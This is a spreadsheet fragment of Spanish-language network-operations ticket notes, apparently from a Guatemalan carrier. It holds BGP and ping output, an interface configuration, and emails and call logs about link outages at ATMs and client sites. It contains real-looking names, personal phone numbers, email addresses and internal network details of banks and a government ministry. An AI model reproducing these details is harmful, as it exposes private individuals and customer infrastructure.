    <t>EL SERVICIO FUE AFECTADO POR UNA RECONVERGENCIA HACE 18 MINUTOS POR ESO SE PROCEDE A VALIDAR CON CLIENTE
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE  VPN_BIMBO_LOCAL PEER | IN  10.1.68.242
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.32.16
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE VPN_BIMBO_LOCAL, ROUTER ID 10.179.32.16:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.1.68.242                      4       64563       24       45     0 00:18:24 ESTABLISHED        4
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE  VPN_BIMBO_LOCAL PEER VERBOSE
         BGP PEER IS 10.1.68.242,  REMOTE AS 64563
         TYPE: EBGP LINK
         BGP VERSION 4, REMOTE ROUTER ID 10.1.68.242
         UPDATE-GROUP ID: 5
         BGP CURRENT STATE: ESTABLISHED, UP FOR 00H18M42S
         BGP CURRENT EVENT: RECVKEEPALIVE
         BGP LAST STATE: OPENCONFIRM
         BGP PEER UP COUNT: 194
         RECEIVED TOTAL ROUTES: 4
         RECEIVED ACTIVE ROUTES TOTAL: 4
         ADVERTISED TOTAL ROUTES: 528
         PORT: LOCAL - 179        REMOTE - 20057
         CONFIGURED: CONNECT-RETRY TIME: 32 SEC
         CONFIGURED: MIN HOLD TIME: 0 SEC
         CONFIGURED: ACTIVE HOLD TIME: 180 SEC   KEEPALIVE TIME:60 SEC
         RECEIVED  : ACTIVE HOLD TIME: 180 SEC
         NEGOTIATED: ACTIVE HOLD TIME: 180 SEC   KEEPALIVE TIME:60 SEC
         PEER OPTIONAL CAPABILITIES:
         PEER SUPPORTS BGP MULTI-PROTOCOL EXTENSION
         PEER SUPPORTS BGP ROUTE REFRESH CAPABILITY
         PEER SUPPORTS BGP 4-BYTE-AS CAPABILITY
         GRACEFUL RESTART CAPABILITY: ADVERTISED
         ADDRESS FAMILY IPV4 UNICAST: ADVERTISED AND RECEIVED
         ADDRESS FAMILY IPV6 UNICAST: RECEIVED
 RECEIVED: TOTAL 24 MESSAGES
                  UPDATE MESSAGES                1
                  OPEN MESSAGES                  1
                  KEEPALIVE MESSAGES             22
                  NOTIFICATION MESSAGES          0
                  REFRESH MESSAGES               0
 SENT: TOTAL 45 MESSAGES
                  UPDATE MESSAGES                22
                  OPEN MESSAGES                  1
                  KEEPALIVE MESSAGES             22
                  NOTIFICATION MESSAGES          0
                  REFRESH MESSAGES               0
 AUTHENTICATION TYPE CONFIGURED: NONE
 LAST KEEPALIVE RECEIVED: 2022-05-28 23:20:09-06:00
 LAST KEEPALIVE SENT    : 2022-05-28 23:20:03-06:00
 LAST UPDATE    RECEIVED: 2022-05-28 23:03:51-06:00
 LAST UPDATE    SENT    : 2022-05-28 23:03:52-06:00
 NO REFRESH RECEIVED SINCE PEER HAS BEEN CONFIGURED
 NO REFRESH SENT SINCE PEER HAS BEEN CONFIGURED
 MAXIMUM ALLOWED ROUTE LIMIT: 1000
 THRESHOLD: 80%, PARAMETER:  IDLE-FOREVER
 MINIMUM ROUTE ADVERTISEMENT INTERVAL IS 30 SECONDS
 OPTIONAL CAPABILITIES:
 ROUTE REFRESH CAPABILITY HAS BEEN ENABLED
 4-BYTE-AS CAPABILITY HAS BEEN ENABLED
 SEND COMMUNITY HAS BEEN CONFIGURED
 SEND EXTEND COMMUNITY HAS BEEN CONFIGURED
 PEER PREFERRED VALUE: 0
 ROUTING POLICY CONFIGURED:
 NO IMPORT UPDATE FILTER LIST
 NO EXPORT UPDATE FILTER LIST
 NO IMPORT PREFIX LIST
 NO EXPORT PREFIX LIST
 IMPORT ROUTE POLICY IS: VPN-INT--VPN_BIMBO_LOCAL
 NO EXPORT ROUTE POLICY
 NO IMPORT DISTRIBUTE POLICY
 NO EXPORT DISTRIBUTE POLICY
 NO IMPORT ROUTE FILTER
 NO EXPORT ROUTE FILTER
&lt;HCHOHNH5N1D1EIM1&gt;</t>
  </si>
  <si>
    <t>EL SERVICIO SE ENCUENTRA OPERATIVO POR PARTE DE CLARO A NIVEL WAN SE VALIDARA SI NO SE TUVO ALGUNA RECONVERGENCIA EN LA RED
&lt;HCHOHNH5N1D1EIM1&gt;PING -C 1500 -S 1500 -M 50 -B -VPN-INSTANCE VPN_BIMBO_LOCAL 10.1.68.242
  PING 10.1.68.242: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.1.68.242 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/15 MS
&lt;HCHOHNH5N1D1EIM1&gt;
PE  10.179.32.16
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE VPN_BIMBO_LOCAL 10.1.68.242
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : VPN_BIMBO_LOCAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.1.68.242/32  DIRECT  0    0                 0.0.0.0         VLANIF3006
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY CURRE
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY CURRENT-CONFIGURATION  INT
&lt;HCHOHNH5N1D1EIM1&gt;DISPLAY CURRENT-CONFIGURATION  INTERFACE  VLANIF3006
#
INTERFACE VLANIF3006
 DESCRIPTION /_/70017/_/DT04MB_UNINET-BIMBO_CHO05
 IP BINDING VPN-INSTANCE VPN_BIMBO_LOCAL
 IP ADDRESS 10.1.68.241 255.255.255.252
 ARP EXPIRE-TIME 300
#
RETURN</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 28 DE MAYO DE 2022 23:34
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70017OH + 1613945OH::: TICKET CNOC IMBBL004047::: "FUERA DE SERVICIO"
ESTIMADO CLIENTE SE ENCONTRÓ EN LOS SERVICIOS QUE SE TUVO UNA RE CONVERGENCIA EN LA RED SE ADJUNTA LA EVIDENCIA LA CUAL SE RESTABLECIÓ HACE 18 MINUTOS QUE FUE LO QUE PERCIBIÓ COMO CAÍDA TOTAL FUE UNA INTERMITENCIA PROVOCADA POR LA RECONVERGENCIA DEL BGP.
  A ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4582062</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL
TIKAL#PING VRF TYT 192.168.159.62 RE 1000 SI 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 1000-BYTE ICMP ECHOS TO 192.168.159.62, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (999/1000), ROUND-TRIP MIN/AVG/MAX = 8/12/212 MS
TIKAL#</t>
  </si>
  <si>
    <t>F4582095</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO EL CONTACTO DE PR
DE: CEMEX RECOVERY LATAM BUSINESS SOLUTIONS &lt;CEMEX.RECOVERY.LATAM.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 8:19
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CEMEX RECOVERY LATAM BUSINESS SOLUTIONS &lt;CEMEX.RECOVERY.LATAM.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: INC000003745100 // INTERIOR INMOBILIARIA LA ROCA//TOTAL ISOLATION// CID: C-0060900601
BUENOS DÍAS EQUIPO,
DESCARTAMOS TEMA DE ENERGÍA, FAVOR DE ESCALAR ESTE CASO PARA SU PRONTA ATENCIÓN, ACCESO A SITIO DE 9 AM A 6 PM, CONTACTO CECILIO ENECÓN LÓPEZ VICENTE
SOPORTE IT LOCAL | GUATEMALA OFICINA: +502 2204 5642, CELULAR: +502 4183 6947.
SALUDOS,
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CECILIO ENECÓN LÓPEZ VICENTE 41836947 MENCIONA QUE NO SE ENCUENTRA EN PR ADICIONAL COMENTA QUE EL TEMA DE LA ENERGIA TODO ESTA BIEN, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001977269</t>
  </si>
  <si>
    <t>F4582150</t>
  </si>
  <si>
    <t>CLIENTE INDICA
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 11:05PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ASUNTO: RE: [RESUELTO ##RE-755837##] ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM1877"
GRACIAS QUEDAMOS ATENTOS CUANDO RESTABLEZCA LA ENERGÍA EN SITIO.
SALUDOS.
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 10:18PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ASUNTO: [RESUELTO ##RE-755837##] ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM1877"
APRECIABLE JUAN RODRIGUEZ CRISTOBAL
SU SOLICITUD NO. ##755837## ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM1877" HA SIDO RESUELTA:
    SI ESTA DE ACUERDO CON LA SOLUCIÓN HAGA CLIC
    CASO CONTRARIO POR FAVOR RESPONDA ESTE CORREO
SOLUCIÓN
BUEN DÍA SE VALIDA CON EL ADMINISTRADOR INFORMA QUE NO CUENTA CON ENERGÍA ELECTRICA EN EL SECTOR
¿
ATENTAMENTE
MARVIN TOC
SERVICIOS 5B</t>
  </si>
  <si>
    <t>CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 7:23PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM187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2150
ID: 47501612T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1877
UBICADO EN:  KM. 85 RUTA AL ALTLANTICO, LAS CHAMPAS, EL RANCHO SAN AGUSTIN ACASAGUASTLAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582165</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253  CONTESTA EL SEÑOR NOE QUIEN SOLICITA QUE SE LE ENVIE POR CORREO LO QUE SE LE REALIZO || SE NOTIFICA  A GESTOR **
ID 3001541237
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253  CONTESTA EL SEÑOR NOE QUIEN SOLICITA QUE SE LE ENVIE POR CORREO LO QUE SE LE REALIZO Y AL ENVIAR EL CORREO QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET
|| SE NOTIFICA  A GESTOR **
ID 3001541237
**</t>
  </si>
  <si>
    <t>F4582250</t>
  </si>
  <si>
    <t>SE VERIFICA ETX 1300 PUERTO 17, LINK DE FO CAÍDO, CON PARAMETROS DE -40 DB SE DEBE DE REALIZAR PRUEBAS DE PRIMER NIVEL CON CLIENTE. NO SE CUENTA CON NOMBRE Y NUMERO DE CONTACTO DE PR, SE ENVIÓ CORREO A CENTRAL DE CLIENTE.
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS NOMBRE Y NUMERO DE CONTACTO DE PERSONA EN DICHA SUCURSAL, YA QUE ES NECESARIO REALIZAR PRUEBAS DE PRIMER NIVEL Y VALIDAR QUE HAYA ENERGÍA COMERCIAL EN LA ZONA.
SALUDOS
.</t>
  </si>
  <si>
    <t>F4582260</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, CONTESTA DILIAN, SE SOLICITA TRANSFERENCIA A LA EXTENSION 2413, INDICA UN ESPERE UN MOMENTO EN LINEA, Y SE CORTA LA LLAMADA, SE INTENTARA LUEGO.
2001880728
COLA:
NOMBRE: A: 24207200
NÚMERO: 24207200
DURACIÓN: 0:01:00
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 24207200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 29/05/2022 09:30:35</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207200 EXT 2413 CONTESTAN PERO CORTAN LLAMADA , SE INTENTARA LUEGO **
ID 200963269
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, RESPONDE SHERLY, TRANFIERE LA LLAMADA A LA EXTENSION 2413, SE CONTESTA LLAMADA PERO NO SE ESCUCHA HABLAR, LUEGO SE CORTA ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA], SE INTENTARA LUEGO.
2001902976
COLA:
NOMBRE: A: 24207200
NÚMERO: 24207200
DURACIÓN: 0:01:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 29/05/2022 12:01:32</t>
  </si>
  <si>
    <t>F4582272</t>
  </si>
  <si>
    <t>### SE ENVIA CORREO A CLIENTE SOLICITANDO VISITA PARA MAÑANA LUNES A LAS 11 HRS || PENDIENTE CONFIRMACIÓN
ASUNTO: VISITA TÉCNICA ATM0328 ||ID PRINCIPAL: 47500910T || UBICADO EN 01 CALLE 02-13 ZONA 3, COBAN, BANCO AGROMERCANTIL
ERITO FERNANDO TECU XITUMUL
BUENA TARTE ESTIMADOS TYT.
EN SEGUIMIENTO AL SERVICIO ATM0328 ||ID PRINCIPAL: 47500910T || UBICADO EN 01 CALLE 02-13 ZONA 3, COBAN, BANCO AGROMERCANTIL BELICE, COBAN. LE COMENTO QUE POR MONITOREO PROACTIVO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR EL MEDIO Y EQUIPOS, POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LA VISITA EN CONJUNTO PARA APERTURA DE ATM EL DÍA DE MAÑANA LUNES 30/05 A LAS 11:00 HRS.</t>
  </si>
  <si>
    <t>CLIENTE INDICA
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 9:41PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-755837##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM1877"
BUEN DÍA SE PROCEDE A SU REVISIÓN
MARVIN TOC
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 9:29PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM032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L CAJERO SE ENCUENTRA ACTIVO POR EL ENLACE 3G POR LO QUE POSIBLEMENTE PRESENTE TIEMPOS ALTOS DE RESPUESTA.
TICKET: F4582272
ID: 47500910T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0328
UBICADO EN:  01 CALLE 02-13 ZONA 3, COBAN, BANCO AGROMERCANTIL BELICE, COBAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582284</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 9:48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SELECTOS_ANTEL_CENT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2284
ID: IP2038527SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_SELECTOS_ANTEL_CENTRO
UBICADO EN:  SAN SALVADOR              DISTRITO COMERCIAL CENTRALCALLE RUBEN DARIO         5A AV NORTE               A UN COSTADO DE TELEGRAFO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582287</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO RUEDA 99202007 INDICA QUE YA HABLO CON PERSONAL DE CLARO KARLA PERDOMO, INDICA QUE EN SITIO YA SABEN QUE TECNICOS LLEGARAN Y QUE SE PROCEDA CON VISITA
2001894971
COLA:
NOMBRE: A: 50499202007
NÚMERO: 50499202007
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50499202007
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 29/05/2022 11:07:55</t>
  </si>
  <si>
    <t>F4582289</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR, CONTESTA PERO LUEGO SE CORTA LA LLAMADA ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA], SE INTENTARA LUEGO.
2001902277
COLA:
NOMBRE: A: 0050495115052
NÚMERO: 0050495115052
DURACIÓN: 0:01:29
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050495115052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 29/05/2022 11:56:12</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ING VICTOR PEÑA 9511-5052 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001963443
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, MENCIONA QUE LOS TECNICOS ESTUVIERON AYER EN SITIO, SE VALIDA QUE NO HAY TICKET QUE INDIQUE QUE FUERON TECNICOS DE CLARO,  POR SER UN ENLACE NO SE GARANTIZA EL ACCESO A INTERNET POR PARTE DE CLARO, ESTA DENTRO DE DEL AMBITO DE IT INTERNO, SE OBSERVA QUE SE TIENEN 20MBPS CONFIGURADOS EN EL CPE, CLIENTE INDICA QUE SE REALIZO CAMBIO DE CENTRAL, AHORA LA CENTRAL ES ID 1678145,   LUEGO SE CORTA LA LLAMADA.
NÚMERO: 22056099
FIN: HOY, 10:31
ID DE LLAMADA: 2001887918</t>
  </si>
  <si>
    <t>F4582295</t>
  </si>
  <si>
    <t>/*/*/*/SE COMUNICA CLIENTE ANTONI TALU PARA SOLICITAR AVANCES, SE VERIFICA F4582295 EN PC SIN CONTACTAR AL CLIENTE Y SE LE INFORMA QUE EL SERVICIO SE ENCUENTRA OPERATIVO, ESTABLE Y CON TIEMPOS DE RESPUESTA OPTIMOS CLIENTE INDICA QUE DESEA HACER PRUEBAS YA QUE TIENE DEMASIADA INESTABILIDAD, SE CONTACTA A GESTOR A CARGO JURGEN.BOCH E INDICA QUE NO PUEDE AYUDAR AL CLIENTE YA QUE TIENE UN ENLACE QUE ESTA ATENDIENDO QUE SE LE INDIQUE AL CLIENTE QUE DEBE ESPERAR UNOS 20MIN PARA QUE PUEDA ATENDERLO, SE LLAMA A JUAN MANUEL CARDONA ID 2001898012/2001898048 NO RESPONDE, SE LLAMA ANGEL CLAVEL ID: 2001898106  SE HACE CONFERENCIA CON GESTOR JUEGEN.BOCH/ PROYECT MANAGER ANGEL CLAVEL QUIENES DETERMINAN QUE GESTOR JHONNSER ESCOBAR EXT 5586 PUEDE ATENDER AL CLIENTE, SE HACE CONFERENCIA Y SE DEJA EN LÍNEA CLIENTE/GESTOR JHONNSER ESCOBAR*/*/*/</t>
  </si>
  <si>
    <t>F4582318</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EN PUNTO REMOTO, PABLO HERNANDEZ, MENCIONA QUE NO TIENE CONOCIMIENTO DEL REPORTE Y QUE GESTION DEL CPE NO SE TIENE POR SU PARTE SOLO CUENTA CON UNA IP DE SIGUIENTE SALTO PARA RUTA ESTATICA 10.200.0.3, POR LO QUE SE CONTACTARA A LA PERSONA QUE REPORTA PARA OBTENER MAS DETALLES DEL CASO, YA QUE DE SER NECESARIO SE COORDINARA VISITA PARA RECUPERAR GESTION DEL CPE.
NÚMERO: 59265779
FIN: HOY, 11:18
ID DE LLAMADA: 2001895988</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE RAFAEL Y PABLO, EL ENLACE ES UN PUNTO A PUNTO ENTRE EL SALVADOR Y GUATEMALA, DE GUATEMALA NO SE LLAGA A LA IP 10.200.0.3,  CLIENTE INDICA NECESITA IDENTIFICAR FISICAMENTE EL EQUIPO DE CLARO EN GUATEMALA EN LA DIRECCION 6AV 3-11 ZONA 4, GUATEMALA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL CAMPOS AL 503 70700664 SOLICITA QUE SE LE LLAME AL SEÑOR PABLO HERANNDEZ**
ID 2001963720
**</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA CORREO CON PLANTILLA DEL CPE Y SE LE ENVIA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 11:15
PARA: RAFAEL.CAMPOS@SEGURIDAD.GOB.SV &lt;RAFAEL.CAMPOS@SEGURIDAD.GOB.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: MP230107027SSV | SD1130118 | FAE DEL MJSP,DGM Y E.
BUEN DÍA, RAFAEL.
ADJUNTO SHOW RUN, SOLICITADO VÍA TELEFÓNICA, DEL CPE.
SALUDOS, CORDIALES.</t>
  </si>
  <si>
